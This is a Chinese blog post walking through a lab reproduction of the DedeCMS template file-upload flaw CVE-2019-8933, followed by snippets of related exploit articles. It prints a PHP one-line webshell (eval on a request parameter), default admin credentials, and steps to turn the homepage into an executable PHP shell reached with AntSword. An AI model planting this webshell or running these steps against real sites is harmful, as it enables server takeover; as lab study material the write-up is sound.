dedecms 文件上传(CVE-2019-8933)

已于 2023-11-20 11:52:04 修改
阅读量235 收藏 2
点赞数 1
文章标签: 网络安全
于 2023-10-28 10:22:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy_wjyjw/article/details/134088228
版权

dedecms 文件上传(CVE-2019-8933)

  • 访问漏洞的ip,点击uploads进入页面

  • 输入IP地址(10.9.47.6:27988/uploads/dede)进入后台

  • 账户名和密码admin:admin登录

  • 选择模板——默认模板管理——新建模板

  • 在内容中输入后门代码(一句话木马)<?php @eval($_REQUEST[777]);?>,点击保存

  • 点击生成——更新主页HTML——主页位置——选择主页模板(浏览选择一句话木马文件)——首页模式——更新主页HTML

  • 选择浏览,地址是(10.9.47.6:27988/uploads/index.php),发现空白网页说明上传成功

  • 用蚁剑添加数据,上传成功

  • 然后打开虚拟终端,输入命令 dir/ tmp命令,成功拿到falg

西柠!
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
**sudo CVE-2019-18634 概念证明** sudo(Superuser DO)是Linux和Unix系统中的一个命令行工具,允许普通用户以超级用户(root)或其他用户的身份执行命令,通常用于管理系统。这个概念证明是关于CVE-2019-18634...
DedeCMS-V5.7(文件上传
shurongyugong的博客
11-24 450
先创建一个授权完成的用户,然后通过重置密码的漏洞登陆,再进行文件上传
【漏洞复现-dedecms-文件上传】vulfocus/dedecms-cve_2019_8933
10-16 3512
dedecms-文件上传】后缀
dedecms 文件上传CVE-2019-8933)漏洞复现
weixin_42675091的博客
09-03 3242
dedecms 文件上传CVE-2019-8933
ClassCMS2.4漏洞复现
2301_80115097的博客
11-30 490
ClassCMS2.4漏洞复现环境搭建任意文件下载漏洞复现漏洞成因。
vulfocus——dedecms文件上传(CVE-2019-8933
m0_62063669的博客
09-14 650
Desdev DedeCMS(织梦内容管理系统)是一套基于PHP的开源内容管理系统(CMS),具有内容发布、内容管理、内容编辑和内容检索等功能。远程攻击者可在通过添加新模板时,将文件名../index.html更改成../index.php,利用该漏洞向uploads/目录上传.php文件并执行该文件。后台路径:/uploads/dede/ 后台密码:admin:admin。3. 模板=>默认模板管理=>新建模板。4.写入一句话木马,然后保存。6.用蚁剑连接一句话木马。5.访问一下这个文件。
dedecms 文件上传CVE-2019-8933
weixin_57567689的博客
10-21 720
dedecms 文件上传CVE-2019-8933
cve-2019-2618:Weblogic上传Vuln(需要用户名密码)-CVE-2019-2618
03-16
cve-2019-2618 Weblogic上传Vuln(需要用户名密码)-CVE-2019-2618python使用python CVE-2019-2618.py url username password解密weblogic密码root@f0cb7e674d7e:~/Oracle# cat /root/Oracle/Middleware/user_...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
漏洞复现-dedecms文件上传CVE-2019-8933
qq_58683895的博客
10-27 924
漏洞复现-5.7SP2版本dedecms文件上传—_CVE-2019-8933
DedeCMS文件上传(CVE-2019-8933)
m0_65150886的博客
02-21 396
index.php利用该漏洞向uploads/目录上传.php文件并执行该文件。后台路径:/uploads/dede/ 后台密码:admin:admin。该系统具有内容发布、内容管理、内容编辑和内容检索等功能。5.点击生成->更新主页HTML,选择主页模板为default/newtpl.htm,主页位置修改为php文件,首页模式选择静态,最后点击更新主页HTML。2.访问http://ip:port/uploads/dede,1.访问http://ip:port,出现如下页面,开始实验。
ClassCMS1.3自解压任意文件上传漏洞分析
weixin_42508548的博客
11-24 2499
0x01 前言 之前在某CMS也接触过自解压导致任意文件上传的漏洞,只要对请求URL过滤不严谨,以及逻辑处理存在缺陷便可导致上传可控,直接一步获取服务器权限。本次通过分析ClassCMS源码,从原理上理解此类漏洞。代审小白,分析不到位请大佬们多多体谅。 0x02 环境搭建 1、首先准备phpstudy,这里使用的是2016版本的,php版本为5.6.27 2、部署cms源码 3、访问http://192.168.150.9/index.php进行安装 4、输入相应配置信息,安装
CVE-2018-9175 DEDECMS后台getshell
weixin_43263451的博客
03-19 1641
基础 dedecms对于输入是首先全局进行过滤的,在/common.inc.php中注册(赋值变量)并过滤外部提交的参数,下图可以看到对输入参数进行addslashes 漏洞分析 首先在 dede\sys_verifies.php的152行 159-160行创建配置文件modifytmp.inc 161-162行给其中写入一些php的头和内容 166行中refiles参数是我们可控的,看起来默认是数组格式,对于refiles里面每一个值从168-180行进行一些操作,注意最重要的是180行,前面都无所谓
DedeCMSCVE-2019-8933
最新发布
m0_74559567的博客
03-15 735
密码就是在字典里面,但是我们发现并没有爆破成功,原因是请求过快,输入错误的时候网页会跳转错误页面然后再返回再次登录。查看源代码,找到验证码的url,当然也可以右键打开验证码链接,或者直接拖就可以。然后再次开始攻击,攻击完成后,排序长度,不一样的基本是成功的。返回Bp插件界面,然后右键导入模板,填入接口url。payload1的位置,添加常用的密码字典进行爆破。点击浏览,是可以被成功解析的,使用蚁剑进行连接。payload2位置,选择的是验证码的插件。抓包验证码的网页后,右键发送到插件。
文件上传漏洞
weixin_52657559的博客
11-23 2125
本文章供交流学习,另外错误部分还请帮忙评论告知便于更改
【漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
做自己喜欢的事,并将其发挥到极致!
05-31 3507
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
wordpress任意文件上传(cve-2019-15866)
09-04
然而,在2019年的漏洞披露中发现了一个名为CVE-2019-15866的重要漏洞,该漏洞使得攻击者可以进行任意文件上传。 该漏洞的利用方式是通过特制的恶意请求,将恶意文件上传到WordPress网站的服务器上。攻击者可以上传...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值